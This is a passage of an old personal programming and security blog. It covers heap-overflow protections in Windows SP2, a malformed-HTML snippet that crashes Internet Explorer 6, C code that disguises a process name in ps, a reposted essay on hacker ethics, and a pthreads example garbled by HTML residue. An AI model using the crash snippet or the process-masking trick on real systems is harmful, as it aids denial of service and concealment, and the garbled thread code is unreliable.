attackers from overflowing a buffer with code and then executing the code (shellcode). However, right now this NX support is only seen in 64 bit processors.The NX feature is nice for protecting against stack overflows, but what about heap overflows??Microsoft calls their heap/stack overflow feature (for 32bit processors) sandboxing. Small "cookies" mark the beginning and end of allocated buffers. These "cookies" are generated based on the heap header. Before memory is allocated and freed, these cookies are checked for consistency. If they are not consistent, then an exception is thrown. Let's dig in a little deeper.As I mentioned earlier, the heap is a double linked list of various free memory. SO, each free piece of memory on the heap must have a header with various information (pointers, size, flags). The main areas of interest here are the pointers. Each free block of memory has a pointer to the next, and previous piece of free memory. Back in the day, if a buffer was overflown, and the neighboring block exsists, and is free, then the next and previous pointers could be overwritten. When this free block is removed from from the list (calls to the next and previous pointers will occur) and execution could jump to shellcode. Quick visualLOW MEMORY-----------------------block header----------------------buffer----------------------block header------------------------next pointer------------------------previous pointer------------------------HIGH MEMORYThe buffer would overflow into the pointers of the neighboring free node. Make sense??? So what Microsoft did with SP2 is to, before each allocation and freeing of heap memory, a quick sanity check is made on the next and previous pointers by using the following concepts of a doubly linked list:

Free_Node -> next -> previous = Free_Node -> previous -> next
Free_Node -> previous -> next = Free_Node

If one of these checks fails, then an exception is thrown and execution stops. The cookies are in the block headers, and are checked to ensure that the buffer hasnt been overflown.CONCLUSIONWell there you have it. I showed you a very simple heap based overflow in order to give you an idea of the concept behind a heap based overflow, and I also demonstrated a few methods that have been utilized to prevent heap based overflows. I hope this was an understanding and helpful tutorial. If I get good responses maybe I will write some more. I'm done.

Bug in IE 6

2007-04-03T13:59:00.000+05:30

This is a bug which I found in IE 2 years ago ;-) Try it, no harm.

The 'shlwapi.dll' dynamic link library causes a calling application to fail when it attempts to render certain malformed HTML tags. This appears to be due to an attempt to perform a string comparison where one of the strings is a null pointer. It has been reported that this vulnerability could not be exploited to cause code execution.

Copy this code and save this as a .html file. You will see your AV bloking this file. :D

<html>
<form>
<input type crash>
</form>
</html>

WorkaroundAs a workaround for explorer.exe, users should open Windows Explorer, select Tools->Folder Options and select the "Use Windows classic folders" option.

It doesnt look like theres an actually fix. It does not crash me at all with both FireFox and the newest IE.

I reference a NULL pointer overwrite. While a NULL pointer exception is hard near impossible to expoit, usually when you can overwrite a section of memory it is possible.

Hide a process

2007-03-30T18:07:00.001+05:30

Here we go... The first kick..
All the programs that will follow are written and tested on RHEL4, with gcc 3.4.5.

Basically you can rename a process to whatever you want by overwriting argv[0], yo uhave to fully null out argv[0] and just a simple strcpy wont work entirely right.

int main(argc, argv)
int argc;
char **argv;
{
char *p;

for (p = argv[0]; *p; p++)
*p = 0;

strcpy(argv[0], "W32WormMail@@VIRUS");

(void) getchar (); /* to allow you to see that ps reports "W32WormMail@@VIRUS" */
return(0);
}

As requested by beginners:

Compile the above program (after including stdio.h and string.h) as follows

g++ -o program.exe program.c

Note: 'top' seems to pick the process names from somewhere else and not from the process table. The above code will change the process table entry. So 'ps' cannot identify the real name of the process. But 'top' can.

Its time...

2007-03-30T17:42:00.000+05:30

I believe, its time to post some tips to become hardcore coders. Hacking, the term which is wrongly interpreted these days, will be redefined here in this blog.

I remember, I read an article about hackers which I would like to share it with you. This will make us to feel more responsible when know what hacking is all about. After reading this am sure that you will not like urself to be one among those who just asks for ways to break into yahoo mail or gmail servers, torture the ignorant net users.

I got this article from here

#################################################
_________________________________________________________

Guide to (mostly) Harmless Hacking

Vol. 6 Real Hackers

No. 1: Eric S. Raymond
_________________________________________________________
"Hackers built the Internet. Hackers made the UNIX operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker...

"There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call
these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer.
Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers no end.

"The basic difference is this:
hackers build things, crackers break them...

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

"If you want to be a hacker, keep reading. If you want to be a cracker, go
read the alt.2600 newsgroup and get ready to do five to ten in the slammer
after finding out you aren't as smart as you think you are. And that's all
I'm going to say about crackers." -- Eric S. Raymond,

http://locke.ccil.org/~esr/faqs/hacker-howto.html

Who are the real hackers? Who are the people we can admire and model our lives upon? The Real Hackers series of these Guides introduces these people.

We start with Eric S. Raymond. He is well known in the hacker world. He
epitomizes all that a real hacker should be. He has wide ranging programming experience: C, LISP, Pascal, APL, FORTRAN, Forth, Perl, and Python; and is proficient in assembly language for the Z80, 80x86, and 680xx CPUs. He also knows French, Spanish and Italian.
Raymond is one of the core developers of Linux, and a major force in the ongoing evolution of the EMACS Lisp language. He maintains fetchmail, a
freeware utility for retrieving and forwarding mail from POP2/POP3/IMAP
mailservers.

But Raymond is perhaps most famous among real hackers as the man who maintains the hacker jargon file. You can read it at http://www.ccil.org/jargon.

He also maintains numerous other well-regarded FAQ and HOWTO documents, including the "Java-On-Linux HOWTO," the "Linux Distributions HOWTO," the "PC-Clone UNIX Hardware Buyer's Guide," the "So You Want To Be A UNIX Wizard? FAQ" (aka The Loginataka), and the "How To Become A Hacker FAQ" --
see http://locke.ccil.org/~esr/faqs/hacker-howto.html (quoted above).

Raymond also founded and runs the Chester County InterLink. This is a 501©3 nonprofit organization that gives free InterNet access to the
residents of Chester County, Pennsylvania. At last count, it had over two
thousand users and was gaining about fifty a week.

Raymond also has written the funniest hacker humor ever: "Unix Wars," which builds upon the really, really ancient hacker humor article, "DEC
Wars." You may read it at http://www.devnull.net/docs/unixwars.html.

Raymond is the author of many books. They include "The New Hackers Dictionary," now in its 3rd edition (MIT Press 1996, ISBN 0-262-68092-0),
and "Learning GNU Emacs," (2nd edition, O'Reilly Associates, ISBN 0-937175-84-6). He was the principal researcher and author of "Portable C and UNIX Systems Programming," (Prentice-Hall ISBN 0-13-686494-5) (the name "J. E. Lapin" appearing on the cover was a corporate fiction). The advent of the September 1996 third edition of "Portable C..." led to interviews with Raymond in Wired magazine (August 1996) and People magazine (October 1996).

"Wait, wait!" you say. "I'm on hacker IRC channels and hacker mail lists all the time and I have never heard of Raymond! Why, he doesn't even have a kewl handle like Mauve Knight or Ei8ht or DisordeR. Sheesh, Raymond isn't
even a member of some 31337 gang with a name like K-rad Doomsters of the
Apocalypse."

Welcome to the world of real hackers. As Raymond points out in his "How To Become A Hacker FAQ," there are two kinds of hackers: real hackers who aspire to learn and create, and the phonies who think crashing or breaking
into a computer proves they are geniuses.

Guess which kind you usually meet at 2600 meetings, on IRC channels with names like #hack, on news groups such as alt.2600 and alt.hacker, and mail lists with names like DC-stuff and HH-Chat? That is not to say that every
single person you will meet there is a lamer and a poser. But few real hackers will put up with the flames, criminal mentality and ignorance of the majority of folks you encounter there.

Where do you meet real hackers like Raymond? You might encounter a few of them at the annual Def Con or Hope on Planet Earth conferences. (Raymond, however, asserts this is "not likely.") You will, however, find real hackers by the hundreds at the Usenix conferences (see http://www.usenix.org/events/), or by the thousands in the free
software movement.

*********************************************************
Newbie note: How can you get involved in the free software movement and get
to know the hacker demigods? For starters, try GNU. GNU stands for "Gnu's
Not UN-IX." The GNU project is an international effort that is being run by
the Free Software Foundation. See http://www.gnu.org/ for more information.
Are you wondering, "Gnu's Not UN-IX? Whaddaya mean?" Be warned, real hackers
have a twisted sense of humor. GNU is a recursive acronym. When the mere
thought of a recursive acronym can throw you into gales of laughter, you
will know you are turning into a real hacker.
*********************************************************

"The free software movement?" you ask. "How come no one ever, ever talks about coding operating system kernels or new scripting languages on
alt.2600 or dc-stuff?" Yup, you guessed it, it's because the majority of
those folks just want to f*** things up. Real hackers aspire to create
software. Not just exploit code for f***ing up computers. But to create
serious, big time software.
The free software movement is where Raymond and his friends -- folks such as Linus Torvalds (the fellow who launched and ran the Linux project that created the operating system most widely used by hackers) and Larry Wall
(creator of Perl, one of the top two programming languages used by hackers)
work together.
Much of the software these hacker demigods write is copylefted. A copyleft is -- yes, you are right, a copyleft is another example of twisted hacker
humor. But basically a copyleft says you have the right to reuse copylefted code in your own software, and even sell it, and make money on it, with only one condition. You must make the source code to your software available for anyone else who may wish to use it in writing their own software.

Want to hang out with the hacker demigods? Have your learned to program pretty well yet? If so, you may discover a warm welcome from the GNU folks and others in the free software movement.

How did Raymond become one of the tribal elders of the hacker world? It all started, he remembers, in 1968 when he was only 11. "My father worked for Sperry Univac. On days off he would take me in to play with the 1108.
It was worth about $8 million -- in 1968 dollars!" Raymond remembers it being a
gigantic computer housed in an air-conditioned room.

Back then it was a major feat for anyone to get their hands on a computer. Back then they were primitive, expensive and fragile. Raymond remembers reading the ACM journal in 1974 and dreaming about how wonderful it would be if he could ever get his hands on that new operating system they were
creating -- Unix. While in high school he did manage to get access -- via teletype -- to a TTY (a verrry primitive terminal) at Ursinus College (located in Phoenixville, Pennsylvania). With that TTY he was able to use the Dartmouth Time-Sharing System computer. But it was mostly just good for playing games.

Raymond began college as a math and philosophy major. But in 1976 he got his hands on an account with a DEC PDP-10 -- and a connection to ARPAn et, the early form of today's Internet. "I was seduced by the computing side."
Raymond soon switched to computer science.

While on ARPAnet, visiting a computer at MIT, Raymond discovered the Hacker Jargon File. Raymond was hooked. He decided he would become a
hacker. A real hacker.

In 1983 Raymond printed out the jargon file, bound it as a book, titled it
"Understanding Your Hacker," and presented it to his boss. His boss loved it.

Back in 1983, few people were afraid of those who called themselves
hackers. Back then people were aware that hackers were odd and brilliant
characters. But that was before crowds of vandals and criminals started
claiming they, too, were hackers. Journalists, at a loss as to what to call
that new breed of digital gang bangers, started calling them hackers, too.

Meanwhile, Raymond came to the realization that he not only had a talent for programming -- he could write texts really well, too. In 1987 he updated "DEC Wars" to create the immortal "Unix Wars," which will finally see print for the first time in Carolyn Meinel's "Happy Hacker" book (American Eagle Publications, in press, due out in late Feb. 1998).

In 1990 Raymond decided to spend a weekend updating the Hacker Jargon File. When Monday morning rolled around, he had quadrupled the size of the file. He contacted the folks who maintained it, who were delighted to let him take it over. Not long afterward, he published it as "The New Hacker's Dictionary."

So what is Raymond doing today? "I do most of my programming in C," he tells us, "but I still think in Lisp." He works "the odd consulting job, technical reviews of books for publishers like O'Reilly." Adds Raymond, laughing, "They know I know where all the bodies are buried."

Where does Raymond see the hacker culture going? "It used to be hard to acculturate, hard to find the hacker community. But now it's expanding
tremendously, thanks to the Linux phenomenon. Linux really made a difference. Now we have a common goal, and a universal platform for people's software projects. Perl has had a similar effect, providing us with a cross-platform tool kit."

Raymond sees some hope even in the fast-growing, yet incredibly
destructive "cracker" scene (crackers are people who break into computers).
"People in the cracker community play awhile, then eventually the bright ones end up coming over to the free software culture. Many of them write to me." Raymond says he has communicated with many people who have gone through a digital vandal stage, only to eventually wake up and realize they wanted to feel good about themselves by making the world a better place.

So, how many future hacker demigods are reading this Guide? Maybe quite a few. May the Source Code be with you if you should choose to quest for hacker fame the Raymond way!
_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out
the official Happy Hacker Web page at http://techbroker.com/happyhacker.html.
Us Happy Hacker folks are against computer crime. We support good,
old-fashioned hacking of the kind that led to the creation of the Internet
and a new era of freedom of information. So please don't email us about any
crimes you may have committed. We won't be impressed. We might even call the
cops on you!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email hacker@techbroker.com with message "subscribe
happy-hacker" in the body of your message.
Copyright 1997 Carolyn P. Meinel <cmeinel@techbroker.com>. These Guides to
(mostly) Harmless Hacking are, in the spirit of copyleft, free for anyone to
forward, post, print out and even make into books to sell -- just so long as
you keep this info attached to this Guide so your readers know where to go
to get free GTMHHs.

R.J. Gosselin, Sr.
~+~+~+~~+~+~+~+~+~+~+~~+~+~+~+~+~+~+~+
Editor-In-Chief -- Happy Hacker Digest
~+~+~+~~+~+~+~+~+~+~+~~+~+~+~+~+~+~+~+

"There is no way you're describing our system,
she could never have gotten past our security.

But I'm going to find her and see that she's prosecuted ...
she broke the law, and she's going to pay!"
President of "Blah Blah Bank"

-->>> Does anybody ELSE see a small discrepancy here ???????

*****************************************
For full story (and many others), download
"External Threats to Computer Security in Networked Systems"
from Winn Schwartau's InfoWar.com bookstore @ http://www.infowar.com/
#################################################

I felt really difficult when I had the enthusiasm to hack but without any learning resouces. So from here on, I will post more ideas into hacking (the real hacking and not cracking). Beginners can use this one to develop themselves and contribute to others also.

Bug in Yahoo authentication

2007-01-20T11:29:00.000+05:30

Here is my post on this, on my other blog.

Thread creation, synchronization with mutex

2006-12-04T14:20:00.001+05:30

Here is my first program with threads on my AUM. Its a very simple program which you can understand just by going through it (Please refer to the links on the right side for basic tutorials on pthreads).

#include 
#include 

pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

void* Fun(void* Val)
{
int j = *(int*)Val;
for (int i = 0; i < face="courier new">    
{
pthread_mutex_lock(&mutex);

if (j == 1)
printf ("%d * %d = %d\t", j, i, j*i);
else
printf ("%d * %d = %d\n", j, i, j*i);

pthread_mutex_unlock(&mutex);
}
pthread_exit(NULL);
}

int main()
{
pthread_t Tid1, Tid2;
int i1 = 1, i2 = 2;

pthread_create(&Tid1, NULL, Fun, (void*)&amp;amp;i1);
pthread_create(&Tid2, NULL, Fun, (void*)&amp;amp;i2);

pthread_join(Tid1, NULL);
pthread_join(Tid2, NULL);

printf ("All done, Well done!!\n");
}

OUTPUT:

Home@AUM ~
$ gcc multi.cpp -lpthread -o multi

Home@AUM ~
$ ./multi
1 * 0 = 0    2 * 0 = 0
1 * 1 = 1    2 * 1 = 2
1 * 2 = 2    2 * 2 = 4
1 * 3 = 3    2 * 3 = 6
1 * 4 = 4    2 * 4 = 8
1 * 5 = 5    2 * 5 = 10
1 * 6 = 6    2 * 6 = 12
1 * 7 = 7    2 * 7 = 14
1 * 8 = 8    2 * 8 = 16
1 * 9 = 9    2 * 9 = 18
1 * 10 = 10    2 * 10 = 20
1 * 11 = 11    2 * 11 = 22
1 * 12 = 12    2 * 12 = 24
1 * 13 = 13    2 * 13 = 26
1 * 14 = 14    2 * 14 = 28
1 * 15 = 15    2 * 15 = 30
1 * 16 = 16    2 * 16 = 32
1 * 17 = 17    2 * 17 = 34
1 * 18 = 18    2 * 18 = 36
1 * 19 = 19    2 * 19 = 38
All done, Well done!!

Home@AUM ~
$

But this is not the output always.. because, the execution of the threads are not sequential and its the kernel that chooses the thread that should be executed. So the following output is also possible.

Home@AUM ~
$ ./1
1 * 0 = 0    1 * 1 = 1    1 * 2 = 2    1 * 3 = 3    1 * 4 = 4    1 * 5 = 5    1 * 6 = 6    1 * 7 = 7    1 * 8 = 8     1 * 9 = 9    1 * 10 = 10    1 * 11 = 11    1 * 12 = 12    1 * 13 = 13    1 * 14 = 14    1 * 15 = 15    1 * 16 = 16    1 * 17 = 17    1 * 18 = 18    1 * 19 = 19    2 * 0 = 0
2 * 1 = 2
2 * 2 = 4
2 * 3 = 6
2 * 4 = 8
2 * 5 = 10
2 * 6 = 12
2 * 7 = 14
2 * 8 = 16
2 * 9 = 18
2 * 10 = 20
2 * 11 = 22
2 * 12 = 24
2 * 13 = 26
2 * 14 = 28
2 * 15 = 30
2 * 16 = 32
2 * 17 = 34
2 * 18 = 36
2 * 19 = 38
All done, Well done!!

Home@AUM ~
$

Think about this for a while. You will understand. If you get confused, then leave a comment.

CygWIN - Get it

2006-12-04T14:08:00.000+05:30

I configured cygwin on my lappy to have a linux feeling. It is good too. I always wanted to try this cygwin. But i never had a faster internet connection to download it and I should admit that i did not have a computer to test it out. My home system was very slow and my bro used it only for gaming.

Those who want to try cygwin can get it from here
. Initially it will download a small (in size) binary, which will then connect to the server to download all its packages. When you download it, make sure you check the options of complete installation and not just the options for beginners.

Be patient, because it took 3 hours for me to download and install all the packages.

Once it is done, you can very well use it as a linux terminal. I love to work in console. So it was looking good for me, except for the junk look of the command prompt (where the bash is emulated).